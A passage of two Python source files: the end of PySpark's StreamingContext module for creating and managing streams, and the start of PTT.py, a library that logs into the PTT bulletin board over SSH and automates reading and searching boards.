# gateway with real port
gw._python_proxy_port = gw._callback_server.port
# get the GatewayServer object in JVM by ID
jgws = JavaObject("GATEWAY_SERVER", gw._gateway_client)
# update the port of CallbackClient with real port
gw.jvm.PythonDStream.updatePythonGatewayPort(jgws, gw._python_proxy_port)
# register serializer for TransformFunction
# it happens before creating SparkContext when loading from checkpointing
cls._transformerSerializer = TransformFunctionSerializer(
SparkContext._active_spark_context, CloudPickleSerializer(), gw)
@classmethod
def getOrCreate(cls, checkpointPath, setupFunc):
"""
Either recreate a StreamingContext from checkpoint data or create a new StreamingContext.
If checkpoint data exists in the provided `checkpointPath`, then StreamingContext will be
recreated from the checkpoint data. If the data does not exist, then the provided setupFunc
will be used to create a JavaStreamingContext.
@param checkpointPath: Checkpoint directory used in an earlier JavaStreamingContext program
@param setupFunc: Function to create a new JavaStreamingContext and setup DStreams
"""
# TODO: support checkpoint in HDFS
if not os.path.exists(checkpointPath) or not os.listdir(checkpointPath):
ssc = setupFunc()
ssc.checkpoint(checkpointPath)
return ssc
cls._ensure_initialized()
gw = SparkContext._gateway
try:
jssc = gw.jvm.JavaStreamingContext(checkpointPath)
except Exception:
print("failed to load StreamingContext from checkpoint", file=sys.stderr)
raise
jsc = jssc.sparkContext()
conf = SparkConf(_jconf=jsc.getConf())
sc = SparkContext(conf=conf, gateway=gw, jsc=jsc)
# update ctx in serializer
SparkContext._active_spark_context = sc
cls._transformerSerializer.ctx = sc
return StreamingContext(sc, None, jssc)
@property
def sparkContext(self):
"""
Return SparkContext which is associated with this StreamingContext.
"""
return self._sc
def start(self):
"""
Start the execution of the streams.
"""
self._jssc.start()
def awaitTermination(self, timeout=None):
"""
Wait for the execution to stop.
@param timeout: time to wait in seconds
"""
if timeout is None:
self._jssc.awaitTermination()
else:
self._jssc.awaitTerminationOrTimeout(int(timeout * 1000))
def awaitTerminationOrTimeout(self, timeout):
"""
Wait for the execution to stop. Return `true` if it's stopped; or
throw the reported error during the execution; or `false` if the
waiting time elapsed before returning from the method.
@param timeout: time to wait in seconds
"""
self._jssc.awaitTerminationOrTimeout(int(timeout * 1000))
def stop(self, stopSparkContext=True, stopGraceFully=False):
"""
Stop the execution of the streams, with option of ensuring all
received data has been processed.
@param stopSparkContext: Stop the associated SparkContext or not
@param stopGracefully: Stop gracefully by waiting for the processing
of all received data to be completed
"""
self._jssc.stop(stopSparkContext, stopGraceFully)
if stopSparkContext:
self._sc.stop()
def remember(self, duration):
"""
Set each DStreams in this context to remember RDDs it generated
in the last given duration. DStreams remember RDDs only for a
limited duration of time and releases them for garbage collection.
This method allows the developer to specify how to long to remember
the RDDs (if the developer wishes to query old data outside the
DStream computation).
@param duration: Minimum duration (in seconds) that each DStream
should remember its RDDs
"""
self._jssc.remember(self._jduration(duration))
def checkpoint(self, directory):
"""
Sets the context to periodically checkpoint the DStream operations for master
fault-tolerance. The graph will be checkpointed every batch interval.
@param directory: HDFS-compatible directory where the checkpoint data
will be reliably stored
"""
self._jssc.checkpoint(directory)
def socketTextStream(self, hostname, port, storageLevel=StorageLevel.MEMORY_AND_DISK_SER_2):
"""
Create an input from TCP source hostname:port. Data is received using
a TCP socket and receive byte is interpreted as UTF8 encoded ``\\n`` delimited
lines.
@param hostname: Hostname to connect to for receiving data
@param port: Port to connect to for receiving data
@param storageLevel: Storage level to use for storing the received objects
"""
jlevel = self._sc._getJavaStorageLevel(storageLevel)
return DStream(self._jssc.socketTextStream(hostname, port, jlevel), self,
UTF8Deserializer())
def textFileStream(self, directory):
"""
Create an input stream that monitors a Hadoop-compatible file system
for new files and reads them as text files. Files must be wrriten to the
monitored directory by "moving" them from another location within the same
file system. File names starting with . are ignored.
"""
return DStream(self._jssc.textFileStream(directory), self, UTF8Deserializer())
def binaryRecordsStream(self, directory, recordLength):
"""
Create an input stream that monitors a Hadoop-compatible file system
for new files and reads them as flat binary files with records of
fixed length. Files must be written to the monitored directory by "moving"
them from another location within the same file system.
File names starting with . are ignored.
@param directory: Directory to load data from
@param recordLength: Length of each record in bytes
"""
return DStream(self._jssc.binaryRecordsStream(directory, recordLength), self,
NoOpSerializer())
def _check_serializers(self, rdds):
# make sure they have same serializer
if len(set(rdd._jrdd_deserializer for rdd in rdds)) > 1:
for i in range(len(rdds)):
# reset them to sc.serializer
rdds[i] = rdds[i]._reserialize()
def queueStream(self, rdds, oneAtATime=True, default=None):
"""
Create an input stream from an queue of RDDs or list. In each batch,
it will process either one or all of the RDDs returned by the queue.
NOTE: changes to the queue after the stream is created will not be recognized.
@param rdds: Queue of RDDs
@param oneAtATime: pick one rdd each time or pick all of them once.
@param default: The default rdd if no more in rdds
"""
if default and not isinstance(default, RDD):
default = self._sc.parallelize(default)
if not rdds and default:
rdds = [rdds]
if rdds and not isinstance(rdds[0], RDD):
rdds = [self._sc.parallelize(input) for input in rdds]
self._check_serializers(rdds)
queue = self._jvm.PythonDStream.toRDDQueue([r._jrdd for r in rdds])
if default:
default = default._reserialize(rdds[0]._jrdd_deserializer)
jdstream = self._jssc.queueStream(queue, oneAtATime, default._jrdd)
else:
jdstream = self._jssc.queueStream(queue, oneAtATime)
return DStream(jdstream, self, rdds[0]._jrdd_deserializer)
def transform(self, dstreams, transformFunc):
"""
Create a new DStream in which each RDD is generated by applying
a function on RDDs of the DStreams. The order of the JavaRDDs in
the transform function parameter will be the same as the order
of corresponding DStreams in the list.
"""
jdstreams = [d._jdstream for d in dstreams]
# change the final serializer to sc.serializer
func = TransformFunction(self._sc,
lambda t, *rdds: transformFunc(rdds).map(lambda x: x),
*[d._jrdd_deserializer for d in dstreams])
jfunc = self._jvm.TransformFunction(func)
jdstream = self._jssc.transform(jdstreams, jfunc)
return DStream(jdstream, self, self._sc.serializer)
def union(self, *dstreams):
"""
Create a unified DStream from multiple DStreams of the same
type and same slide duration.
"""
if not dstreams:
raise ValueError("should have at least one DStream to union")
if len(dstreams) == 1:
return dstreams[0]
if len(set(s._jrdd_deserializer for s in dstreams)) > 1:
raise ValueError("All DStreams should have same serializer")
if len(set(s._slideDuration for s in dstreams)) > 1:
raise ValueError("All DStreams should have same slide duration")
first = dstreams[0]
jrest = [d._jdstream for d in dstreams[1:]]
return DStream(self._jssc.union(first._jdstream, jrest), self, first._jrdd_deserializer)
|
PTT.py
|
import sys
import time
import re
import threading
import progressbar
import socket
import array
import paramiko
from paramiko import ECDSAKey
from uao import Big5UAOCodec
uao = Big5UAOCodec()
try:
from . import Util
from . import Version
from . import ErrorCode
from . import Information
except SystemError:
import Util
import Version
import ErrorCode
import Information
Version = Version.Ver
LogLevel = Information.LogLevel()
PushType = Information.PushType()
ErrorCode = ErrorCode.ErrorCode()
ReplyPostType = Information.ReplyPostType()
FriendListType = Information.FriendListType()
OperateType = Information.OperateType()
WaterBallOperateType = Information.WaterBallOperateType
WaterBallType = Information.WaterBallType
PostSearchType = Information.PostSearchType
PostDeleteStatus = Information.PostDeleteStatus
class ResponseUnit(object):
def __init__(self, SendMessage, Refresh):
self.__SendMessage = SendMessage
self.__Refresh = Refresh
def getSendMessage(self):
return self.__SendMessage
def needRefresh(self):
return self.__Refresh
class DetectUnit(object):
def __init__(self, DisplayMsg, DetectTarget, Response, BreakDetect=False, ErrCode=0, LogLV=0):
self.__DisplayMsg = DisplayMsg
self.__DetectTarget = DetectTarget
self.__Response = Response
self.__BreakDetect = BreakDetect
self.__ErrCode = ErrCode
if LogLV == 0:
self.__LogLevel = LogLevel.INFO
else:
self.__LogLevel = LogLV
def isMatch(self, Screen):
if self.__DetectTarget in Screen:
return True
return False
def getDisplayMsg(self):
return self.__DisplayMsg
def getDetectTarget(self):
return self.__DetectTarget
def getResponse(self):
return self.__Response
def isBreakDetect(self):
return self.__BreakDetect
def getErrorCode(self):
return self.__ErrCode
def getLogLevel(self):
return self.__LogLevel
PTTBUGDetectUnit = DetectUnit(
'遇到 PTT BUG!!',
'PttBug',
ResponseUnit(' ', False),
BreakDetect=True,
ErrCode = ErrorCode.PttBug
)
GotoMainMenuCommand = '\x1b\x4fD\x1b\x4fD\x1b\x4fD\x1b\x4fD\x1b\x4fD'
RefreshCommand = '\x0C'
# \x1b\x4fA (上, 下右左 BCD)
MoveUpCommand = '\x1b\x4fA'
MoveDownCommand = '\x1b\x4fB'
MoveRightCommand = '\x1b\x4fC'
MoveLeftCommand = '\x1b\x4fD'
class Library(object):
def __init__(self, ID='', Password='', kickOtherLogin=True, MaxIdleTime=20, _LogLevel=-1, WaterBallHandler=None, LogHandler=None, PreWait=0, EveryWait=0, MaxEveryWait=0, MinEveryWait=0):
self.__host = 'ptt.cc'
self.__ID = ID
self.__Password = Password
self.__kickOtherLogin = kickOtherLogin
self.__LoginMode_Login = 1
self.__LoginMode_Recover = 2
self.__LoginMode_MultiLogin = 3
self.__Refresh = '\x0C'
# screen size
self.width = 80
self.height = 24
# screen buffer
self.screen = ''
self.buf_size = self.width * self.height
self.__LogHandler = LogHandler
self.__LogLevel = LogLevel.INFO
if _LogLevel != -1:
if _LogLevel < LogLevel.MinValue or LogLevel.MaxValue < _LogLevel:
self.Log('LogLevel error: ' + str(_LogLevel))
return None
else:
self.__LogLevel = _LogLevel
self.__isMailBoxFull = False
self.__MailFullAPILock = False
self.__DefaultTimeout = 5
self.__Cursor = '>'
self.__MaxMultiLogin = 5
self.__ConnectList = [None] * self.__MaxMultiLogin
self.__ReceiveData = [''] * self.__MaxMultiLogin
self.__ReceiveRawData = [''] * self.__MaxMultiLogin
self.__PreReceiveData = [''] * self.__MaxMultiLogin
self.__isConnected = [False] * self.__MaxMultiLogin
self.ReceiveData = ''
self.__isBackground = False
self.__delAllWord = '\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08'
self.__ShowProgressBar = True
self.__IdleTime = 0
self.__MaxIdleTime = MaxIdleTime
if PreWait == 0:
self.__PreWait = 0.01
else:
self.__PreWait = PreWait
if EveryWait == 0:
self.__EveryWait = 0.01
else:
self.__EveryWait = EveryWait
if MaxEveryWait == 0:
self.__MaxEveryWait = 0.01
else:
self.__MaxEveryWait = MaxEveryWait
if MinEveryWait == 0:
self.__MinEveryWait = 0.01
else:
self.__MinEveryWait = MinEveryWait
try:
self.Log('偵測到前景執行使用編碼: ' + sys.stdin.encoding)
self.__isBackground = False
except Exception:
self.Log('偵測到背景執行')
self.__isBackground = True
if ID != '':
self.Log('使用者帳號: ' + ID)
if Password != '':
TempPW = ''
for i in range(len(Password)):
TempPW += '*'
self.Log('密碼: ' + TempPW)
self.__SSHKey = ECDSAKey.generate()
self.Log('產生 SSH 金鑰完成')
self.__IdleThread = None
self.__RunIdleThread = False
self.__WaterBallHandler = WaterBallHandler
if self.__WaterBallHandler != None:
self.__MaxIdleTime = 2
self.__WaterBallList = []
self.__APILock = [threading.Lock()] * self.__MaxMultiLogin
self.__ErrorCode = ErrorCode.Success
def __AntiLogout(self):
self.__RunIdleThread = True
while self.__RunIdleThread and threading.main_thread().is_alive():
self.__IdleTime += 1
time.sleep(1)
if self.__IdleTime < self.__MaxIdleTime:
continue
ErrCode, result = self.getTime()
self.__IdleTime = 0
return
def __WaterBallProceeor(self):
if self.__WaterBallHandler == None:
return
while len(self.__WaterBallList) != 0:
CurrentWaterBall = self.__WaterBallList.pop(0)
try:
self.__WaterBallHandler(CurrentWaterBall)
except TypeError:
self.Log('WaterBallHandler 介面錯誤', LogLevel.WARNING)
except:
self.Log('WaterBallHandler 未知錯誤', LogLevel.WARNING)
def __APICheck(self, API):
# sys._getframe().f_code.co_name
# self.__isConnected[ConnectIndex]
if API == 'register' and self.__isConnected[0]:
self.Log('請勿在登入後,執行註冊功能', LogLevel.CRITICAL)
self.__ErrorCode = ErrorCode.MustRunBeforeLogin
return False
if self.__MailFullAPILock:
self.Log('機器人已被卡在信箱區,僅能取得信件與最新信件編號與寄信', LogLevel.CRITICAL)
self.Log('請清理信箱並重新登入機器人', LogLevel.CRITICAL)
self.__ErrorCode = ErrorCode.MailBoxFull
return False
self.__ErrorCode = ErrorCode.Success
return True
def showScreen(self, ErrCode, FunctionName):
ConnectIndex=0
self.Log('PTT 畫面輸出開始')
try:
print(self.__ReceiveData[ConnectIndex].encode(sys.stdin.encoding, "replace").decode(sys.stdin.encoding))
except Exception:
print(self.__ReceiveData[ConnectIndex].encode('utf-8', "replace").decode('utf-8'))
self.Log('PTT 畫面輸出結束')
def __showScreen(self, ErrCode, FunctionName, ConnectIndex=0, _LogLevel=-1):
if _LogLevel == -1:
_LogLevel = self.__LogLevel
if _LogLevel >= self.__LogLevel:
print('-' * 50)
try:
print(self.__PreReceiveData[ConnectIndex].encode(sys.stdin.encoding, "replace").decode(sys.stdin.encoding))
except Exception:
print(self.__PreReceiveData[ConnectIndex].encode('utf-8', "replace").decode('utf-8'))
print('頻道 ' + str(ConnectIndex) + ' 畫面長度為: ' + str(len(self.__ReceiveData[ConnectIndex])) + ' ' + str(len(self.__PreReceiveData[ConnectIndex])))
print('-' * 50)
try:
print(self.__ReceiveData[ConnectIndex].encode(sys.stdin.encoding, "replace").decode(sys.stdin.encoding))
except Exception:
print(self.__ReceiveData[ConnectIndex].encode('utf-8', "replace").decode('utf-8'))
print('錯誤在 ' + FunctionName + ' 函式發生')
print('-' * 50)
def Log(self, Message, _LogLevel=-1):
if _LogLevel == -1:
_LogLevel = LogLevel.INFO
if _LogLevel < LogLevel.MinValue or LogLevel.MaxValue < _LogLevel:
print('[錯誤] MinValue error: ' + str(LogLevel.MinValue))
print('[錯誤] MaxValue error: ' + str(LogLevel.MaxValue))
print('[錯誤] LogLevel error: ' + str(_LogLevel))
return ErrorCode.ErrorInput
if self.__LogLevel <= _LogLevel:
if _LogLevel == LogLevel.DEBUG:
Prefix = '[除錯] '
elif _LogLevel == LogLevel.WARNING:
Prefix = '[警告] '
elif _LogLevel == LogLevel.INFO:
Prefix = '[資訊] '
elif _LogLevel == LogLevel.CRITICAL:
Prefix = '[重要] '
Message = str(Message)
if len(Message) > 0:
Util.Log(Prefix + Message)
if self.__LogHandler != None:
try:
self.__LogHandler(Message)
except TypeError:
self.Log('LogHandler 介面錯誤', LogLevel.WARNING)
except:
self.Log('LogHandler 未知錯誤', LogLevel.WARNING)
return ErrorCode.Success
def operatePTT(self, SendMessage):
self.__IdleTime = 0
ConnectIndex = 0
self.__APILock[ConnectIndex].acquire()
result = self.__operatePTT(0, SendMessage=SendMessage, Refresh=True)
self.__WaterBallProceeor()
self.__APILock[ConnectIndex].release()
return result
def __operatePTT(self, ConnectIndex, SendMessage='', CatchTargetList=[], Refresh=False, ExtraWait=0):
SendMessageTimeout = 10.0
PreWait = self.__PreWait
EveryWait = self.__EveryWait
MaxEveryWait = self.__MaxEveryWait
MinEveryWait = self.__MinEveryWait
if CatchTargetList == None:
CatchTargetList = []
ErrCode = ErrorCode.Success
self.__PreReceiveData[ConnectIndex] = self.__ReceiveData[ConnectIndex]
self.__ReceiveData[ConnectIndex] = ''
try:
if SendMessage != '':
if Refresh:
SendMessage += self.__Refresh
TimeCout = 0
StartTime = time.time()
time.sleep(PreWait)
while not self.__ConnectList[ConnectIndex].channel.send_ready():
time.sleep(EveryWait)
if TimeCout >= 100:
TimeCout = 0
NowTime = time.time()
if (NowTime - StartTime) >= SendMessageTimeout:
self.Log('超時斷線,重新連線')
self.__connectRemote(ConnectIndex)
return self.__operatePTT(ConnectIndex, SendMessage, CatchTargetList, Refresh, ExtraWait)
TimeCout += 1
EncodeMessage, Len = uao.encode(SendMessage)
self.__ConnectList[ConnectIndex].channel.send(EncodeMessage)
TimeCout = 0
StartTime = time.time()
time.sleep(PreWait)
while not self.__ConnectList[ConnectIndex].channel.recv_ready():
time.sleep(EveryWait)
if TimeCout >= 100:
TimeCout = 0
NowTime = time.time()
if (NowTime - StartTime) >= SendMessageTimeout:
self.Log('超時斷線,重新連線')
self.__connectRemote(ConnectIndex)
return self.__operatePTT(ConnectIndex, SendMessage, CatchTargetList, Refresh, ExtraWait)
TimeCout += 1
self.__ReceiveData[ConnectIndex] = self.__wait_str(ConnectIndex)
while self.__ConnectList[ConnectIndex].channel.recv_ready():
time.sleep(EveryWait)
self.__ReceiveData[ConnectIndex] += self.__recv_str(ConnectIndex)
DelateDetect = [False] * 5
while DelateDetect.count(True) == 5:
DelateDetect = [False] * 5
for i in range(5):
time.sleep(PreWait)
while self.__ConnectList[ConnectIndex].channel.recv_ready():
DelateDetect[i] = True
time.sleep(EveryWait)
self.__ReceiveData[ConnectIndex] += self.__recv_str(ConnectIndex)
DelateDetectCount = DelateDetect.count(True)
if DelateDetectCount > 3:
EveryWait += 0.01
if EveryWait > MaxEveryWait:
EveryWait = MaxEveryWait
elif DelateDetectCount == 0:
EveryWait -= 0.01
if EveryWait < MinEveryWait:
EveryWait = MinEveryWait
except socket.timeout:
self.Log('超時斷線,重新連線')
self.__connectRemote(ConnectIndex)
return self.__operatePTT(ConnectIndex, SendMessage, CatchTargetList, Refresh, ExtraWait)
except OSError:
self.Log('作業系統錯誤斷線,重新連線')
self.__connectRemote(ConnectIndex)
return self.__operatePTT(ConnectIndex, SendMessage, CatchTargetList, Refresh, ExtraWait)
except KeyboardInterrupt:
self.Log('使用者中斷')
self.__ErrorCode = ErrorCode.UserInterrupt
return self.__ErrorCode, -1
except:
self.Log('斷線,重新連線')
self.__connectRemote(ConnectIndex)
return self.__operatePTT(ConnectIndex, SendMessage, CatchTargetList, Refresh, ExtraWait)
# self.__ReceiveData[ConnectIndex] = self.__ReceiveData[ConnectIndex].decode(encoding='big5',errors='ignore')
# self.__ReceiveRawData[ConnectIndex] = self.__ReceiveData[ConnectIndex]
self.__ReceiveRawData[ConnectIndex], Len = uao.decode(self.__ReceiveData[ConnectIndex])
self.__ReceiveData[ConnectIndex] = self.__ReceiveRawData[ConnectIndex]
self.__ReceiveRawData[ConnectIndex] = self.__cleanScreen(self.__ReceiveRawData[ConnectIndex], NoColor=False)
self.__ReceiveData[ConnectIndex] = self.__cleanScreen(self.__ReceiveData[ConnectIndex])
if ConnectIndex == 0:
self.ReceiveData = self.__ReceiveData[ConnectIndex]
if self.__WaterBallHandler != None:
line = self.__ReceiveData[ConnectIndex].split('\n').pop()
# if '★' in line:
if line.startswith(' ★'):
line = line[3:]
WaterBallAuthor = line[:line.find(' ')]
WaterBallContent = line[line.find(' ') + 1:line.find(' [K')]
# print('WaterBallAuthor: =' + WaterBallAuthor + '=')
# print('WaterBallContent: =' + WaterBallContent + '=')
CurrentWaterBall = Information.WaterBallInformation(WaterBallType.Catch, WaterBallAuthor, WaterBallContent)
self.__WaterBallList.append(CurrentWaterBall)
for i in range(len(CatchTargetList)):
if CatchTargetList[i] in self.__ReceiveData[ConnectIndex]:
self.__ConnectList[ConnectIndex].channel.settimeout(self.__DefaultTimeout)
return ErrorCode.Success, i
self.__ConnectList[ConnectIndex].channel.settimeout(self.__DefaultTimeout)
self.__ErrorCode = ErrCode
return ErrCode, -1
def __cleanScreen(self, screen, NoColor=True):
if not screen:
return screen
# http://asf.atmel.com/docs/latest/uc3l/html/group__group__avr32__utils__print__funcs.html#ga024c3e2852fe509450ebc363df52ae73
# ShowTarget = '洗髮用品、洗臉卸粧用品、沐浴用品、香皂類'
# if ShowTarget in screen:
# self.Log('========================')
# self.Log(str(screen))
# self.Log('========================')
# if '[2J' in screen:
# screen = screen[screen.find('[2J'):]
PreNewLineMark = -1
PTTLibraryNewLineMark = '==PTTLibraryNewLineMark=='
for NewLineMark in range(1, 25):
for Type in range(1, 26):
Target = '[' + str(NewLineMark) + ';' + str(Type) + 'H'
if Target in screen:
if PreNewLineMark == -1:
NewLineCount = screen[:screen.find(Target)].count('\n')
NewLine = NewLineMark - NewLineCount - 1
# if ShowTarget in screen:
# print('NewLineMark', NewLineMark)
# print('NewLineCount', NewLineCount)
# print('NewLine', NewLine)
if NewLine < 1:
NewLine = 1
screen = screen.replace(Target, PTTLibraryNewLineMark * NewLine)
else:
NewLineMarkCount = NewLineMark - PreNewLineMark
NewLineCount = screen[screen.rfind(PTTLibraryNewLineMark) : screen.find(Target)].count('\n')
NewLine = NewLineMarkCount - NewLineCount
# if ShowTarget in screen:
# print('NewLineMark', NewLineMark)
# print('NewLineCount', NewLineCount)
# print('NewLine', NewLine)
if NewLine < 1:
NewLine = 1
screen = screen.replace(Target, PTTLibraryNewLineMark * NewLine)
PreNewLineMark = NewLineMark
screen = screen.replace(PTTLibraryNewLineMark, '\n')
# if ShowTarget in screen:
# self.Log('----------------------')
# self.Log(str(screen))
# self.Log('----------------------')
# screen = screen.replace('[2J ', '')
screen = screen.replace('[2J', '')
if NoColor:
screen = re.sub('\[[\d+;]*[mH]', '', screen)
screen = re.sub(r'[\r]', '', screen)
screen = re.sub(r'[\x00-\x08]', '', screen)
screen = re.sub(r'[\x0b\x0c]', '', screen)
screen = re.sub(r'[\x0e-\x1f]', '', screen)
screen = re.sub(r'[\x7f-\xff]', '', screen)
# self.Log('after: ' + str(screen))
return screen
def __wait_str(self, ConnectIndex):
ch = ''
while True:
ch = self.__ConnectList[ConnectIndex].channel.recv(1)
if ch:
break
# return self.__dec_bytes(ch)
return ch
def __recv_str(self, ConnectIndex):
# return self.__dec_bytes(self.__ConnectList[ConnectIndex].channel.recv(self.buf_size))
return self.__ConnectList[ConnectIndex].channel.recv(self.buf_size)
# decode byte array to UTF-8 string
def __dec_bytes(self, bytes):
return bytes.decode('utf-8', errors = 'ignore')
def __connectRemote(self, ConnectIndex):
global ErrorCode
self.__isConnected[ConnectIndex] = False
RetryCount = 0
Retry = False
ErrCode = ErrorCode.Success
while not self.__isConnected[ConnectIndex]:
if Retry:
Retry = False
RetryCount += 1
if RetryCount == 3:
self.__ErrorCode = ErrCode
return ErrCode
else:
RetryCount = 0
try:
self.__isConnected[ConnectIndex] = False
if self.__ConnectList[ConnectIndex] != None:
self.__ConnectList[ConnectIndex] = None
self.Log('連線頻道 ' + str(ConnectIndex) + ' 重啟')
else:
self.Log('連線頻道 ' + str(ConnectIndex) + ' 啟動')
self.__ConnectList[ConnectIndex] = paramiko.SSHClient()
# self.__ConnectList[ConnectIndex].load_system_host_keys()
# self.__ConnectList[ConnectIndex].set_missing_host_key_policy(paramiko.WarningPolicy())
self.__ConnectList[ConnectIndex].set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.__ConnectList[ConnectIndex].connect('ptt.cc', username = 'bbs', password = '', pkey = self.__SSHKey)
self.__ConnectList[ConnectIndex].channel = self.__ConnectList[ConnectIndex].invoke_shell(width = self.width, height = self.height)
except paramiko.AuthenticationException:
# print('... Authentication failed')
self.Log('連接至 ' + self.__host + ' SSH 認證失敗')
self.__ErrorCode = ErrorCode.SSHFail
return ErrorCode.SSHFail
except Exception as e:
# print('... Connection failed:', str(e))
self.Log('連接至 ' + self.__host + ' 連線失敗')
self.__ErrorCode = ErrorCode.RemoteHostDown
return ErrorCode.RemoteHostDown
except paramiko.SSHException:
self.Log('建立 SSH 通道失敗')
self.__ErrorCode = ErrorCode.SSHFail
return ErrorCode.SSHFail
except KeyboardInterrupt:
self.Log('使用者中斷')
self.__ErrorCode = ErrorCode.UserInterrupt
return ErrorCode.UserInterrupt
except:
self.Log('主機沒有回應')
Retry = True
self.__ErrorCode = ErrorCode.UnknowError
ErrCode = ErrorCode.UnknowError
continue
self.Log('頻道 ' + str(ConnectIndex) + ' 建立互動通道成功')
self.__ConnectList[ConnectIndex].channel.settimeout(self.__DefaultTimeout)
if ConnectIndex == 0:
KickMsg = '頻道 ' + str(ConnectIndex) + ' 刪除重複登入的連線' if self.__kickOtherLogin else '不刪除重複登入的連線'
KickResponse = 'y\r' if self.__kickOtherLogin else 'n\r'
else:
KickMsg = '副頻道不刪除重複登入的連線'
KickResponse = 'n\r'
SendMessage = ''
Refresh = True
isBreakDetect = False
# 先後順序代表偵測的優先順序
DetectTargetList = [
DetectUnit(
'頻道 ' + str(ConnectIndex) + ' 郵件已滿',
'您保存信件數目',
ResponseUnit(GotoMainMenuCommand, True),
),
DetectUnit(
'任意鍵繼續',
'任意鍵',
ResponseUnit(GotoMainMenuCommand, True)
),
DetectUnit(
'頻道 ' + str(ConnectIndex) + ' 放棄未完成文章',
'有一篇文章尚未完成',
ResponseUnit('q\r', False)
),
DetectUnit(
'頻道 ' + str(ConnectIndex) + ' 密碼錯誤',
'請檢查帳號及密碼大小寫有無輸入錯誤',
ResponseUnit(' ', False),
BreakDetect=True,
ErrCode = ErrorCode.WrongPassword
),
DetectUnit(
'頻道 ' + str(ConnectIndex) + ' 系統負荷過重,重新執行連線',
'為避免系統負荷過重, 請稍後再試',
ResponseUnit(' ', False),
BreakDetect=True,
ErrCode = ErrorCode.WaitTimeout
),
DetectUnit(
'頻道 ' + str(ConnectIndex) + ' 更新與同步線上使用者及好友名單',
'更新與同步線上使用者及好友名單',
ResponseUnit('\x1b\x4fD\x1b\x4fD', False)
),
DetectUnit(
KickMsg,
'刪除其他重複登入的連線',
ResponseUnit(KickResponse, True)
),
DetectUnit(
'頻道 ' + str(ConnectIndex) + ' 刪除錯誤嘗試紀錄',
'您要刪除以上錯誤嘗試的記錄嗎',
ResponseUnit('y\r', False)
),
DetectUnit(
'頻道 ' + str(ConnectIndex) + ' 登入成功',
'我是' + self.__ID,
ResponseUnit(' ', False),
BreakDetect=True,
),
DetectUnit(
'頻道 ' + str(ConnectIndex) + ' 輸入密碼',
'請輸入您的密碼:',
ResponseUnit(self.__Password + '\r', False)
),
DetectUnit(
'頻道 ' + str(ConnectIndex) + ' 輸入帳號',
'請輸入代號,或以 guest 參觀,或以 new 註冊',
ResponseUnit(self.__ID + '\r', False)
),
PTTBUGDetectUnit
]
LoginFailCount = 0
MaxLoginFail = 2
while not isBreakDetect:
# self.Log('SendMessage: ->' + SendMessage + '<-')
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('登入超時重新嘗試')
break
elif ErrCode != ErrorCode.Success:
self.Log('登入操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__ErrorCode = ErrCode
return ErrCode
# self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
LoginFailCount = 0
self.Log(DetectTarget.getDisplayMsg())
if '郵件已滿' in DetectTarget.getDisplayMsg():
self.__isMailBoxFull = True
SendMessage = DetectTarget.getResponse().getSendMessage()
Refresh = DetectTarget.getResponse().needRefresh()
isDetectedTarget = True
if DetectTarget.isBreakDetect():
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
break
if not isDetectedTarget:
if LoginFailCount < MaxLoginFail:
self.Log('頻道 ' + str(ConnectIndex) + ' 讀取 PTT 畫面..')
Refresh = True
LoginFailCount += 1
SendMessage = ''
continue
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
if ErrCode == ErrorCode.WaitTimeout:
Retry = True
elif ErrCode != ErrorCode.Success:
self.__ErrorCode = ErrCode
return ErrCode
if '> (' in self.__ReceiveData[ConnectIndex]:
self.Log('新式游標模式', LogLevel.DEBUG)
self.__Cursor = '>'
self.__isConnected[ConnectIndex] = True
elif '●(' in self.__ReceiveData[ConnectIndex]:
self.Log('舊式游標模式', LogLevel.DEBUG)
self.__Cursor = '●'
self.__isConnected[ConnectIndex] = True
else:
self.Log('頻道 ' + str(ConnectIndex) + ' 無法偵測游標。重新執行連線')
# return ErrorCode.UnknowError
return ErrorCode.Success
def login(self, ID='', Password=''):
self.__IdleTime = 0
if ID != '':
self.__ID = ID
self.Log('使用者帳號: ' + ID)
if Password != '':
self.__Password = Password
TempPW = ''
for i in range(len(Password)):
TempPW += '*'
self.Log('密碼: ' + TempPW)
if len(self.__Password) > 8:
self.__Password = self.__Password[:8]
self.__ID = self.__ID.replace('\r', '').replace('\n', '')
self.__Password = self.__Password.replace('\r', '').replace('\n', '')
ErrCode = self.__connectRemote(0)
if ErrCode == ErrorCode.Success:
self.__IdleThread = threading.Thread(target=self.__AntiLogout)
self.__IdleThread.start()
self.__ErrorCode = ErrCode
return ErrCode
def logout(self):
ConnectIndex = -1
self.__IdleTime = 0
self.__RunIdleThread = False
if ConnectIndex == -1:
self.Log('準備登出所有頻道')
for index in range(self.__MaxMultiLogin):
self.__isConnected[index] = False
for index in range(self.__MaxMultiLogin):
if self.__ConnectList[index] == None:
continue
self.Log('頻道 ' + str(index) + ' 登出', LogLevel.DEBUG)
SendMessage = GotoMainMenuCommand + ' g\ry\r'
ErrCode, CatchIndex = self.__operatePTT(index, SendMessage=SendMessage)
self.Log('頻道 ' + str(index) + ' 登出成功')
ErrCode = ErrorCode.Success
self.__ErrorCode = ErrCode
return ErrCode
def __getNewestPostIndex(self, Board, ConnectIndex=0, SearchType=0, Search=''):
result = 0
CatchList = [
# 0
'文章選讀',
]
# SendMessage = '\x1b\x4fD\x1b\x4fD\x1b\x4fDqs' + Board + '\r\x03\x03 0\r$'
SendMessage = GotoMainMenuCommand + 'qs' + Board + '\r\x03\x03 '
if SearchType == PostSearchType.Keyword:
SendMessage += '/' + Search + '\r'
elif SearchType == PostSearchType.Author:
SendMessage += 'a' + Search + '\r'
elif SearchType == PostSearchType.Push:
SendMessage += 'Z' + Search + '\r'
elif SearchType == PostSearchType.Mark:
SendMessage += 'G' + Search + '\r'
elif SearchType == PostSearchType.Money:
SendMessage += 'A' + Search + '\r'
SendMessage += '0\r$'
Refresh = True
ExtraWait = 0
